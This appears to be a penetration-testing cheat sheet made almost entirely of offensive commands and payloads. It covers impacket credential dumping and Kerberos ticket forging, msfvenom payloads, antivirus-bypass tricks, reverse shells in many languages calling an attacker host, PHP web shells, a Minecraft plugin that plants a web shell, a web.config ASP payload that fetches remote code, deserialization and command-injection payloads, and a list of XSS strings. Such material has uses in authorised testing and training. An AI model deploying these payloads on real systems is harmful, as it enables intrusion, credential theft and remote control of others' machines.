C:\Windows\Registration\CRMLog
C:\Windows\System32\FxsTmp
C:\Windows\System32\com\dmp
C:\Windows\System32\Microsoft\Crypto\RSA\MachineKeys
C:\Windows\System32\spool\PRINTERS
C:\Windows\System32\spool\SERVERS
C:\Windows\System32\spool\drivers\color
C:\Windows\System32\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\System32\Tasks_Migrated (after performing a version upgrade of Windows 10)
C:\Windows\SysWOW64\FxsTmp
C:\Windows\SysWOW64\com\dmp
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\SyncCenter
C:\Windows\SysWOW64\Tasks\Microsoft\Windows\PLA\System
powershell -c "$SecPass = ConvertTo-SecureString 'Welcome1!' -AsPlainText -Force;$cred=New-Object System.Management.Automation.PSCredential('administrator', $SecPass);Start-Process -FilePath 'C:\Users\Public\Downloads\nc.exe' -ArgumentList '-e cmd <LHOST> <LPORT>' -Credential $cred"
Bash Privilege Escalation
id
sudo -l
uname -a
cat /etc/hosts
cat /etc/fstab
cat /etc/passwd
ss -tulpn
ps -auxf
ls -lahv
ls -R /home
Basic Windows Enumeration
systeminfo
whoami /all
net users
net users <USERNAME>
sudo ruby /usr/local/bin/evil-winrm -i <RHOST> -u <USERNAME> -p <PASSWORD>
find ./ -type f -exec grep --color=always -i -I 'password' {} \;
find / -group <group> 2>/dev/null
find / -user <USERNAME> 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null
find / -user <USERNAME> 2>/dev/null | grep -v proc 2>/dev/null
find / -user <USERNAME> -ls 2>/dev/null | grep -v proc 2>/dev/null
find / -perm -4000 2>/dev/null
find / -perm -4000 2>/dev/null | xargs ls -la
find / -type f -user root -perm -4000 2>/dev/null
grep -R db_passwd
grep -roiE "password.{20}"
grep -oiE "password.{20}" /etc/*.conf
impacket-smbserver local . -smb2support
impacket-reg <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION> <ACTION>
impacket-services <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST> <ACTION>
impacket-netview <RHOST>/<USERNAME> -targets /PATH/TO/FILE/<FILE>.txt -users /PATH/TO/FILE/<FILE>.txt
impacket-lookupsid <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-GetADUsers -all -dc-ip <RHOST> <RHOST>/
impacket-getST <RHOST>/<USERNAME> -spn WWW/<DOMAIN_CONTROLLER>.<RHOST> -hashes :d64b83fe606e6d3005e20ce0ee932fe2 -impersonate Administrator
impacket-rpcdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-samrdump <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-atexec -k -no-pass <RHOST>/Administrator@<DOMAIN_CONTROLLER>.<RHOST> 'type C:\PATH\TO\FILE\<FILE>'
export KRB5CCNAME=<USERNAME>.ccache
impacket-smbclient <RHOST>/<USERNAME>:<PASSWORD/PASSWORD_HASH>@<RHOST>
impacket-smbclient -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass
impacket-getTGT <RHOST>/<USERNAME>:<PASSWORD>
impacket-getTGT <RHOST>/<USERNAME> -dc-ip <RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:7c662956a4a0486a80fbb2403c5a9c2c
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format hashcat -outputfile hashes.asreproast
impacket-GetNPUsers <RHOST>/<USERNAME> -request -no-pass -dc-ip <RHOST>
impacket-GetNPUsers <RHOST>/ -usersfile usernames.txt -format john -outputfile hashes
impacket-getUserSPNs / GetUserSPNs.py
export KRB5CCNAME=<USERNAME>.ccache
impacket-GetUserSPNs <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <RHOST>.<RHOST> -no-pass -request
export KRB5CCNAME=<USERNAME>.ccache
impacket-secretsdump <RHOST>/<USERNAME>@<RHOST>
impacket-secretsdump -k <RHOST>/<USERNAME>@<RHOST>.<RHOST> -no-pass -debug
impacket-secretsdump -ntds ntds.dit -system system -hashes lmhash:nthash LOCAL -output nt-hash
impacket-secretsdump -dc-ip <RHOST> <RHOST>.LOCAL/svc_bes:<PASSWORD>@<RHOST>
impacket-secretsdump -sam SAM -security SECURITY -system SYSTEM LOCAL
impacket-psexec <USERNAME>@<RHOST>
impacket-psexec <RHOST>/administrator@<RHOST> -hashes aad3b435b51404eeaad3b435b51404ee:8a4b77d52b1845bfe949ed1b9643bb18
Valid User
NTHASH
Domain-SID
export KRB5CCNAME=<USERNAME>.ccache
impacket-ticketer -nthash C1929E1263DDFF6A2BCC6E053E705F78 -domain-sid S-1-5-21-2743207045-1827831105-2542523200 -domain <RHOST> -spn MSSQLSVC/<RHOST>.<RHOST> -user-id 500 Administrator
Fixing [-] exceptions must derive from BaseException
./GetUserSPNs.py <RHOST>/<USERNAME>:<PASSWORD> -k -dc-ip <DOMAIN_CONTROLLER>.<RHOST> -no-pass -request
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
[-] exceptions must derive from BaseException
241         if self.__doKerberos:
242             #target = self.getMachineName()
243             target = self.__kdcHost
msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00\x0a" -a x86 --platform windows -f exe -o exploit.exe
msf6 > use exploit/multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST <LHOST>
msf6 exploit(multi/handler) > set LPORT <LPORT>
msf6 exploit(multi/handler) > run
.\exploit.exe
PS C:\> set-executionpolicy remotesigned
PS C:\> Set-ExecutionPolicy unrestricted
PS C:\> powershell.exe -noprofile -executionpolicy bypass -file .\<FILE>.ps1
Import Module to PowerShell cmdlet
PS C:\> import-module ./<module / powershell script>
Check PowerShell Versions
PS Set-ExecutionPolicy Unrestricted
PS powershell -Command "$PSVersionTable.PSVersion"
PS powershell -c "[Environment]::Is64BitProcess"
PS /home/kali> $offsec_session = New-PSSession -ComputerName <RHOST> -Authentication Negotiate -Credential <USERNAME>
PS /home/kali> Enter-PSSession $offsec_session
Import-CliXml
Export-CliXml
PS C:\> powershell -c "$cred = Import-CliXml -Path cred.xml; $cred.GetNetworkCredential() | Format-List *"
AntiVirus Bypass for Invoke-Expression (IEX)
PS C:\> <COMMAND> | & ($PsHOme[4]+$PShoMe[30]+'x')
$PSHome[4]  // equals "i"
$PSHome[30] // equals "e"
+ x         // adds an "x"
PS C:\> $eNV:COmSPeC[4,15,25]-JOiN ''
$eNV:COmSPeC[4]  // equals "i"
$eNV:COmSPeC[15] // equals "e"
$eNV:COmSPeC[25] // equals "x"
PS C:\> whoami /all
PS C:\> getuserid
PS C:\> net users
PS C:\> net users <USERNAME>
PS C:\> Get-ADUser -Filter * -SearchBase "DC=<RHOST>,DC=LOCAL"
Invoke-Expression File Transfer
PS C:\> IEX (IWR http://<LHOST>/<FILE>.ps1 -UseBasicParsing)
Add new Domain Administrator
PS C:\> $PASSWORD = ConvertTo-SecureString -AsPlainText -Force -String <PASSWORD>
PS C:\> New-ADUser -Name "<USERNAME>" -Description "<DESCRIPTION>" -Enabled $true -AccountPassword $PASSWORD
PS C:\> Add-ADGroupMember -Identity "Domain Admins" -Members <USERNAME>
Execute Commands in User Context
PS C:\> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlaintext -Force
PS C:\> $cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
PS C:\> Invoke-Command -computername <COMPUTERNAME> -ConfigurationName dc_manage -credential $cred -command {whoami}
Execute Scripts with Credentials (Reverse Shell)
PS C:\Windows\system32> $pass = ConvertTo-SecureString "<PASSWORD>" -AsPlainText -Force
PS C:\Windows\system32> $cred = New-Object System.Management.Automation.PSCredential("<DOMAIN>\<USERNAME>", $pass)
PS C:\Windows\system32> Invoke-Command -ComputerName <RHOST> -ScriptBlock { IEX (New-Object Net.WebClient).downloadString('http://<LHOST>/<FILE>.ps1') } -Credential $cred
PS C:\Users\<USERNAME>\Downloads\backups> $username = "<DOMAIN>\<USERNAME>"
PS C:\Users\<USERNAME>\Downloads\backups> $password = "<PASSWORD>"
PS C:\Users\<USERNAME>\Downloads\backups> $secstr = New-Object -TypeName System.Security.SecureString
PS C:\Users\<USERNAME>\Downloads\backups> $password.ToCharArray() | ForEach-Object {$secstr.AppendChar($_)}
PS C:\Users\<USERNAME>\Downloads\backups> $cred = new-object -typename System.Management.Automation.PSCredential -argumentlist $username, $secstr
PS C:\Users\<USERNAME>\Downloads\backups> new-pssession -computername . -credential $cred

 Id Name            ComputerName    ComputerType    State         ConfigurationName     Availability
 -- ----            ------------    ------------    -----         -----------------     ------------
  1 WinRM1          localhost       RemoteMachine   Opened        Microsoft.PowerShell     Available

PS C:\Users\<USERNAME>\Downloads\backups> enter-pssession 1
[localhost]: PS C:\Users\<USERNAME>\Documents> whoami
<DOMAIN>\<USERNAME>
tasklist /SVC
netsh firewall show state
schtasks /query /fo LIST /v
driverquery.exe /v /fo csv | ConvertFrom-CSV | Select-Object 'Display Name', 'Start Mode', Path
sc query
sc qc <service-name>
accesschk.exe -uws "Everyone" "C:\Program Files"
dir /s *pass* == *cred* == *vnc* == *.config*
findstr /si password *.xml *.ini *.txt
wmic qfe get Caption,Description,HotFixID,InstalledOn # no new patches - KEXP pretty likely
Writeable Directories in Linux
bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1
bash -c 'bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1'
echo -n '/bin/bash -c "/bin/bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"' | base64
curl --header "Content-Type: application/json" --request POST http://<RHOST>:<RPORT>/upload --data '{"auth": {"name": "<USERNAME>", "password": "<PASSWORD>"}, "filename" : "& echo "bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1"|base64 -d|bash"}'
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
r = Runtime.getRuntime(); p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/<LHOST>/<LPORT>;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]); p.waitFor();
package <NAME>;

import org.bukkit.plugin.java.JavaPlugin;
import java.io.IOException;
import java.nio.file.Files;
import java.nio.file.Paths;
import java.nio.file.StandardOpenOption;

public class Main extends JavaPlugin {
    @Override
    public void onDisable() {
        super.onDisable();
    }

    @Override
    public void onEnable() {
        final String PHP_CODE = "<?php system($_GET['cmd']); ?>";
        try {
            Files.write(Paths.get("/var/www/<RHOST>/shell.php"), PHP_CODE.getBytes(), StandardOpenOption.CREATE_NEW);
        } catch (IOException e) {
            e.printStackTrace();
        }
        super.onEnable();
    }
}
http://<RHOST>');os.execute("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <LHOST> <LPORT> >/tmp/f")--
-- ';bash -i >& /dev/tcp/<LHOST>/<LPORT> 0>&1;'--
mkfifo /tmp/shell; nc <LHOST> <LPORT> 0</tmp/shell | /bin/sh >/tmp/shell 2>&1; rm /tmp/shell
nc -e /bin/sh <LHOST> <LPORT>
perl -e 'use Socket;$i="<LHOST>";$p=<LPORT>;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
php -r '$sock=fsockopen("<LHOST>",<LPORT>);exec("/bin/sh -i <&3 >&3 2>&3");'
$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "# ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()
powershell - nop - c "$client = New-Object System.Net.Sockets.TCPClient('<LHOST>',<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"
powershell -nop -exec bypass -c '$client = New-Object System.Net.Sockets.TCPClient("<LHOST>",<LPORT>);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + "PS " + (pwd).Path + "> ";$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()'
$socket = new-object System.Net.Sockets.TcpClient('127.0.0.1', 413);
if($socket -eq $null){exit 1}
$stream = $socket.GetStream();
$writer = new-object System.IO.StreamWriter($stream);
$buffer = new-object System.Byte[] 1024;
$encoding = new-object System.Text.AsciiEncoding;
do
{
    $writer.Flush();
    $read = $null;
    $res = ""
    while($stream.DataAvailable -or $read -eq $null) {
        $read = $stream.Read($buffer, 0, 1024)
    }
    $out = $encoding.GetString($buffer, 0, $read).Replace("`r`n","").Replace("`n","");
    if(!$out.equals("exit")){
        $args = "";
        if($out.IndexOf(' ') -gt -1){
            $args = $out.substring($out.IndexOf(' ')+1);
            $out = $out.substring(0,$out.IndexOf(' '));
            if($args.split(' ').length -gt 1){
                $pinfo = New-Object System.Diagnostics.ProcessStartInfo
                $pinfo.FileName = "cmd.exe"
                $pinfo.RedirectStandardError = $true
                $pinfo.RedirectStandardOutput = $true
                $pinfo.UseShellExecute = $false
                $pinfo.Arguments = "/c $out $args"
                $p = New-Object System.Diagnostics.Process
                $p.StartInfo = $pinfo
                $p.Start() | Out-Null
                $p.WaitForExit()
                $stdout = $p.StandardOutput.ReadToEnd()
                $stderr = $p.StandardError.ReadToEnd()
                if ($p.ExitCode -ne 0) {
                    $res = $stderr
                } else {
                    $res = $stdout
                }
            }
            else {
                $res = (& "$out" "$args") | out-string;
            }
        }
        else {
            $res = (& "$out") | out-string;
        }
        if($res -ne $null){
            $writer.WriteLine($res)
        }
    }
}While (!$out.equals("exit"))
$writer.close();
$socket.close();
$stream.Dispose()
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
python -c 'import pty,subprocess,os,time;(master,slave)=pty.openpty();p=subprocess.Popen(["/bin/su","-c","id","bynarr"],stdin=slave,stdout=slave,stderr=slave);os.read(master,1024);os.write(master,"fruity\n");time.sleep(0.1);print os.read(master,1024);'
echo python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("<LHOST>",<LPORT>));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);' > <FILE>
ruby -rsocket -e 'f=TCPSocket.open("<LHOST>",<LPORT>).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
<?php system($_GET['cmd']); ?>
<?php echo exec($_POST['cmd']); ?>
<?php echo passthru($_GET['cmd']); ?>
<?php passthru($_REQUEST['cmd']); ?>
<?php echo system($_REQUEST['shell']); ?>
cd path/to/nishang/Shells/
cp Invoke-PowerShellTcp.ps1 Invoke-PowerShellTcp.ps1
tail -3 Invoke-PowerShellTcp.ps1
}
Invoke-PowerShellTcp -Reverse -IPAddress <LHOST> -Port <LPORT>
powershell "IEX(New-Object Net.Webclient).downloadString('http://<LHOST>:<LPORT>/Invoke-PowerShellTcp.ps1')"
msfvenom -p windows/shell_reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -f c -a x86 --platform windows -b "\x00\x0a\x0d" -e x86/shikata_ga_nai
msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=<LHOST> LPORT=<LPORT> -b "\x00" -e x86/shikata_ga_nai -f exe -o /tmp/shell.exe
java -jar ysoserial-master-SNAPSHOT.jar
java -jar ysoserial-master-SNAPSHOT.jar CommonsCollections1 'nc <LHOST> <LPORT> -e /bin/sh' | base64 -w 0
java -jar ysoserial.jar Groovy1 calc.exe > groovypayload.bin
java -jar ysoserial-master-6eca5bc740-1.jar CommonsCollections4 "$jex" > /tmp/$filename.session
<?xml version="1.0" encoding="UTF-8"?>
<configuration>
  <system.webServer>
    <handlers accessPolicy="Read, Script, Write">
      <add name="web_config" path="*.config" verb="*" modules="IsapiModule" scriptProcessor="%windir%\system32\inetsrv\asp.dll" resourceType="Unspecified" requireAccess="Write" preCondition="bitness64" />
    </handlers>
    <security>
      <requestFiltering>
        <fileExtensions>
          <remove fileExtension=".config" />
        </fileExtensions>
        <hiddenSegments>
          <remove segment="web.config" />
        </hiddenSegments>
      </requestFiltering>
    </security>
  </system.webServer>
</configuration>
<!-- ASP code comes here! It should not include HTML comment closing tag and double dashes!
<%
Set s = CreateObject("WScript.Shell")
Set cmd = s.Exec("cmd /c powershell -c IEX (New-Object Net.Webclient).downloadstring('http://<LHOST>/shellyjelly.ps1')")
o = cmd.StdOut.Readall()
Response.write(o)
%>
-->
- hosts: localhost
  tasks:
  - name: badyml
    command: chmod +s /bin/bash
Exploit Skeleton Python Script
#!/usr/bin/python3
import socket, sys

address = '127.0.0.1'
port = 9999
buffer = b''  # TBD: payload bytes go here

# Create the socket outside the try block so finally can always close it.
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
    print('[+] Sending buffer')
    s.connect((address, port))
    s.recv(1024)
    s.send(buffer + b'\r\n')
except Exception:
    print('[!] Unable to connect to the application.')
    sys.exit(0)
finally:
    s.close()
POST /<path> HTTP/1.1
Host: <RHOST>
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Content-Type: application/json
Content-Length: 95
Connection: close

{
  "auth":{
    "name":"<USERNAME>",
    "password":"<PASSWORD>"
  },
  "filename":"<FILE>"
}
<script>alert('XSS')</script>
<scr<script>ipt>alert('XSS')</scr<script>ipt>
"><script>alert('XSS')</script>
"><script>alert(String.fromCharCode(88,83,83))</script>
<script src="http://<LHOST>/<FILE>"></script>
<img src=x onerror=alert('XSS');>
<img src=x onerror=alert('XSS')//
<img src=x onerror=alert(String.fromCharCode(88,83,83));>
<img src=x oneonerrorrror=alert(String.fromCharCode(88,83,83));>
<img src=x:alert(alt) onerror=eval(src) alt=xss>
"><img src=x onerror=alert('XSS');>
"><img src=x onerror=alert(String.fromCharCode(88,83,83));>
<svg onload=alert(1)>
<svg/onload=alert('XSS')>
<svg onload=alert(1)//
<svg/onload=alert(String.fromCharCode(88,83,83))>
<svg id=alert(1) onload=eval(id)>
"><svg/onload=alert(String.fromCharCode(88,83,83))>
"><svg/onload=alert(/XSS/)
<svg><script href=data:,alert(1) /> (`Firefox` is the only browser which allows self closing script)
<div onpointerover="alert(45)">MOVE HERE</div>
<div onpointerdown="alert(45)">MOVE HERE</div>
<div onpointerenter="alert(45)">MOVE HERE</div>
<div onpointerleave="alert(45)">MOVE HERE</div>
<div onpointermove="alert(45)">MOVE HERE</div>
<div onpointerout="alert(45)">MOVE HERE</div>
<div onpointerup="alert(45)">MOVE HERE</div>